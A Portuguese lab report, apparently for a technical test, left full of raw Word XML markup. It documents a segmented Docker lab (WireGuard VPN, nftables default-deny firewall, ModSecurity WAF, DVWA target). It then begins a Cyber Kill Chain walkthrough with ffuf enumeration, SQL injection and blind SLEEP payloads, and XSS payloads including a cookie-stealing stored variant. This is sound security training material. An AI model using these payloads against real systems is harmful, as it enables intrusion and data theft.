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gz2t402ly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Introdução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laboratório reproduz, localmente e com um único comando, um recorte representativo de uma infraestrutura corporativa segmentada (borda VPN, DMZ, camada de aplicação e banco de dados), sobre o qual será demonstrado o ciclo completo de segurança: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">atacar, entender e conter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desta primeira fase foi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">construir a infraestrutura defensiva base</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — segmentação de rede, firewall com política </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">default-deny</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, VPN de acesso administrativo, os serviços-alvo e um WAF na borda da aplicação — de forma </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reprodutível, documentada e fiel ao diagrama proposto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Toda a plataforma sobe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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ou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up</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), sem passos manuais, e nenhum segredo é versionado no repositório.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premissa condutora foi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"tudo o que não é explicitamente permitido é negado"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Cada caminho de rede autorizado é uma regra explícita e comentada; todo o resto é bloqueado por padrão.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wjwipsmu8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Arquitetura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 único, orquestrado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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">quatro redes isoladas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">container-roteador</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que filtra todo o tráfego entre elas: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5.9526241228216"/>
        <w:gridCol w:w="1633.2777649655718"/>
        <w:gridCol w:w="1222.5980957401246"/>
        <w:gridCol w:w="5003.683326195105"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1165.9526241228216"/>
            <w:gridCol w:w="1633.2777649655718"/>
            <w:gridCol w:w="1222.5980957401246"/>
            <w:gridCol w:w="5003.683326195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Borda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lab_edge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wg-gateway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Roteador/firewall (nftables) + entrada VPN (WireGuard)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DMZ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172.30.10.0/24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waf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dvwa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WAF (ModSecurity + CRS) na frente do alvo vulnerável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172.30.20.0/24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app-api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API interna (pivô lateral) que guarda a credencial do banco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172.30.30.0/24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postgres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Dados sensíveis (alvo de exfiltração)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três redes de segmento são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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sem rota para a internet). O único ponto de contato com o mundo externo é a porta UDP do WireGuard, na rede de borda. Todo tráfego entre segmentos é obrigado a passar pelo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wg-gateway</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, onde a política de firewall é aplicada.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l19tostu9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 que foi feito, por que e como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3pqu2mkhsn50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 Segmentação e firewall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default-deny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quê:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> redes Docker isoladas separam no nível de enlace (L2), mas não oferecem controle por porta, log, nem estado de conexão — e, no instante em que um roteador liga dois segmentos, o tráfego passa a menos que algo o filtre. A segmentação real exige um ponto de controle L3/L4.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wg-gateway</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> é um container conectado às três redes (multi-homed),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NET_ADMIN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ip_forward=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rodando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nftables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com política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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nas cadeias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forward</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Apenas dois fluxos entre segmentos são liberados, de forma explícita e comentada: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DMZ → APP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, somente na porta da aplicação (8000);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APP → DB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, somente na porta do Postgres (5432).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Qualquer outro caminho (por exemplo, DMZ → DB) cai no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">default-deny</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. O uso de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connection tracking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> garante que apenas o primeiro pacote de cada conexão seja avaliado contra as regras; as respostas retornam automaticamente pelo estado da conexão.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Validação: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provamos, com evidência, que DMZ→APP e APP→DB funcionam nas portas certas e que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DMZ→DB é recusado</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (timeout — a assinatura de um pacote descartado silenciosamente pelo firewall, diferente de um "connection refused").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gclv2yv69ir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 VPN WireGuard e acesso administrativo restrito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quê:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> acesso administrativo (SSH) não pode estar exposto na internet. A regra do jogo é "admin somente via VPN".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wg-gateway</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> termina um túnel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WireGuard</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (um peer). O firewall só aceita SSH cuja origem seja a sub-rede da VPN — sem túnel, o SSH é negado; com túnel, é permitido. Comprovamos os dois casos (negado sem VPN, funcional com VPN).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Diferencial de hardening:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o login administrativo é </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exclusivamente por chave</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (autenticação por senha desabilitada), aplicando defesa em profundidade — camada de rede (só via VPN) somada à camada de autenticação (só por chave).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g4y5o3f8sq9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 Deploy dos serviços respeitando o firewall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três serviços foram implantados </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dentro dos segmentos corretos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, respeitando as regras já existentes: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DVWA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (alvo vulnerável) na DMZ, atrás do WAF.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app-api</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> na camada APP: uma API que guarda a credencial do banco e expõe, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">de forma proposital e documentada</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, um endpoint interno sem autenticação que a vaza — este é o elo de movimento lateral que a cadeia de ataque irá explorar. Fora esse endpoint intencional, a API segue boas práticas (consultas parametrizadas, validação de tipo, erros genéricos).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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> na camada DB, fechado (sem exposição de porta ao host), com dados fictícios sensíveis para o cenário de exfiltração.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Detalhe de rede relevante:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> como os segmentos são isolados, os serviços recebem uma rota padrão apontando para o gateway, forçando o tráfego inter-segmento a atravessar o firewall. Confirmamos, com o tráfego real dos serviços, que os fluxos permitidos passam e os proibidos são bloqueados.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fvg0im235po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3.4. WAF (ModSecurity + OWASP CRS) em modo detecção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quê:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a defesa reativa da borda de aplicação deve, primeiro, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">observar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> os ataques (para depois bloqueá-los com precisão e medir falsos positivos).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um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx com ModSecurity e o OWASP Core Rule Set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi colocado como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> na frente do DVWA, em modo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DetectionOnly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">detecta e registra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cada ataque, mas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">não bloqueia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ainda. Validamos enviando um SQL Injection: o ataque </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passou</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (comportamento esperado nesta fase) e apareceu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">integralmente no log de auditoria</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, com as regras acionadas e a pontuação de anomalia. Na fase de defesa, esse mesmo motor será virado para modo de bloqueio (respondendo 403).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72ce1gjztdv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3.5. Acesso ao alvo (modelo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VPN-gated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permitir a exploração do alvo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sem expor uma aplicação vulnerável na internet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o acesso ao DVWA é feito </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">através da VPN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: o firewall libera, de forma controlada, apenas o caminho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VPN → WAF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, e nenhum serviço vulnerável fica publicamente acessível. É a mesma postura de segurança que o laboratório pratica — o WAF é o único ponto de entrada da aplicação, e só a partir de dentro do túnel.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xe619og1z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Desafios reais resolvidos (e por que importam)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montagem envolveu problemas de rede que exigiram diagnóstico, não apenas configuração — o que reforça a compreensão da stack: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camada de firewall do próprio Docker fica na frente do nosso gateway.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pacotes inter-segmento eram descartados pelo Docker antes de chegarem ao nftables. A correção foi liberar, de forma controlada, apenas o trânsito do laboratório na cadeia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DOCKER-USER</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (avaliada pelo Docker antes da sua isolação), mantendo o nftables como o firewall efetivo. Isso mapeia diretamente para a realidade da nuvem, onde a camada de rede do provedor (Security Groups/NACL) precisa permitir o tráfego até o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">appliance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que então aplica a política fina.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Porta publicada não chega a container puramente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internal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A entrada da VPN exigiu uma interface de borda dedicada — o que também é mais fiel ao diagrama (o gateway tem uma face "internet" e três faces internas).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Diagnóstico com evidência.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cada correção foi confirmada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tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, contadores de regra do nftables e testes de conectividade, e está registrada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/evidence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a35z28pyf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Qualidade de entrega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Um comando sobe tudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, do zero, de forma reprodutível.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Nenhum segredo no repositório</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: chaves da VPN, chave SSH e credencial do banco são geradas localmente e ignoradas pelo versionamento; apenas exemplos e chaves públicas são versionados.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Especificação dirigida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specs/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define a arquitetura, a matriz de firewall e os critérios de aceite testáveis por etapa.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Evidência por etapa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/evidence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comando + saída de cada verificação, incluindo os "caminhos negados sendo negados".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 Team Engagement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demonstrar que está acessível apenas pela VPN nós desativamos a mesma e com isso rodamos um scan no host com isso provando que o host está acessível apenas internamente, segue a imagem de comprovação olhando para nosso TCP e UDP do ambiente. Então alguém de fora não consegue acessar nada, o host de fora não expõe nada do lab.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com a VPN ligada já é possível alcançar a aplicação no WAF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ao mesmo tempo, quando estamos dentro da VPN é possível acessar o WAF não é possível acessar o DVWA.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começar os testes então decidi por seguir a metodologia mais conhecida que é a Cyber Kill Chain.\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Onde no primeiro passo vamos fazer o reconhecimento do que vamos explorar, depois vamos nos armar e entender o que podemos explorar naquela aplicação e após isso fazer o Delivery que é entregar um payload para a aplicação por exemplo e após isso a exploração onde conseguimos explorar a aplicação. Logo após instalar um malware dentro da aplicação e conseguir fazer o Command &amp; Control para ganharmos a persistência na mesma e podermos realizar o que quisermos.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Reconnaissance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 primeiro passo para conseguir invadir uma aplicação de forma bem sucedida e encontrar vulnerabilidades realmente críticas seria um bom reconhecimento e para isso em primeiro lugar nós vamos executar o comando curl.exe -I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http://172.30.10.5:8080/login.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> buscando encontrar headers vulneráveis e entender o que está por trás da aplicação web em PHP e com isso vamos receber de resultado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 aqui já temos algumas noções de falha de segurança o cookie já entrega isso bem. Além de IDs de sessões do PHP além do CORS bem permissivo e também mostra que tem firewall pelo nginx.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Após isso vamos ver se tem arquivos comuns dentro da aplicação, com isso podemos ver o seguinte.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Arquivos comuns que contém informações úteis para uma enumeração estão expostos e podemos usá-los para explorar.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Agora com esses achados podemos nos aprofundar um pouco mais no nosso scan rodando uma wordlist em diretórios para tentar encontrar mais informações. Vou rodar a ferramenta chamada FFUF, onde ela é responsável por enumerar diretórios.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ffuf -u http://172.30.10.5:8080/FUZZ -w C:\Users\guiam\Documents\H-W-TechnicalTest\scripts\wordlists\common-web.txt -mc all -t 20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 isso agora vimos alguns paths que podemos usar para explorar a aplicação também que foram retornados ou 302 ou 200 que podemos tentar achar mais informações e o que roda por trás para tentar explorar como por exemplo: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vulnerabilities/sqli</w:t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vulnerabilities/sqli_blind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vulnerabilities/xss_r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vulnerabilities/xss_s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vulnerabilities/xss_d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vulnerabilities/upload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vulnerabilities/exec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vulnerabilities/fi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vulnerabilities/csrf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vulnerabilities/brute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vulnerabilities/weak_id</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">paths encontrados pelo ffuf que podemos tentar explorar, vamos começar pelos módulos em ordem respectiva a de cima.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 Injection</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">O primeiro passo para explorar um SQLi é entender como funciona, o SQLi ele é uma vulnerabilidade que permite enganar logicamente a query enviada para o banco de dados fazendo ela trazer dados que não deveria. Como por exemplo no exemplo a baixo. Quando fazemos uma busca de um ID comum ele nos retorna.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4927600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Mas quando fazemos uma troca da lógica fazendo ele pensar “Me traga 1 ou qualquer coisa que exista” com a lógica 1’or’1’=’1’ ele nos trás</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="5435600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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usuários e senhas da aplicação e com isso eu conseguiria fazer login em qualquer usuário.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Injection Blind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">No SQLi Blind a lógica é a mesma mas não vai retornar nada da aplicação para a sua tela, basicamente o que vai acontecer é que a aplicação vai responder de forma diferente com o seu payload. Por exemplo, ao invés de retornar um 200 OK retornar um 500 Internal Server Error.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Um payload que podemos utilizar é o de sleep para provar que aceita SQL mostrando que está o retorno pode demorar com base no que você coloca do SQL, vou utilizar o seguinte payload.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1' AND 1=2 AND SLEEP(5)-- -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003800"/>
            <wp:effectExtent b="0" l="0" r="0" t="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Onde vai demorar 5 segundos ou mais para trazer a resposta do banco, ele não traz os dados mas diz que o banco está aceitando input.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XSS Reflected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O XSS reflected não é considerado bem uma vulnerabilidade, ele pode ser mais usado para ver como o site reage e se comporta com DOM e input de payload JS mas você não consegue capturar nenhum dado de usuário. O payload que vamos usar é o simples. &lt;script&gt;alert(1)&lt;/script&gt; onde ao colocar esse payload ele vai nos redirecionar para uma outra página.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241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XSS Stored</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Esse tipo de XSS já pode ser considerado um tipo válido de vulnerabilidade, o mesmo pode ser colocado por exemplo no comentário de um site e quando uma vítima acessar o site retornar os cookies do site como trouxe a baixo.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5016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XSS DOM</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">O XSS DOM ele acontece dentro do navegador o servidor nem chega a receber esse payload o JavaScript lê o dado e nem retorna para o servidor volta direto para o usuário final, para explorar o XSS DOM ele é um pouco mais complicado, vamos ter que analisar o HTML da página, como podemos ver abaixo cada língua está dentro de um &lt;option&gt; e cada option retorna no querystring acima no navegador.</w:t>
      </w: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tentar explorar primeiro vamos ter que fechar a tag onde o payload pode ser introduzido, um exemplo de payload seria.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&lt;/option&gt;&lt;/select&gt;&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
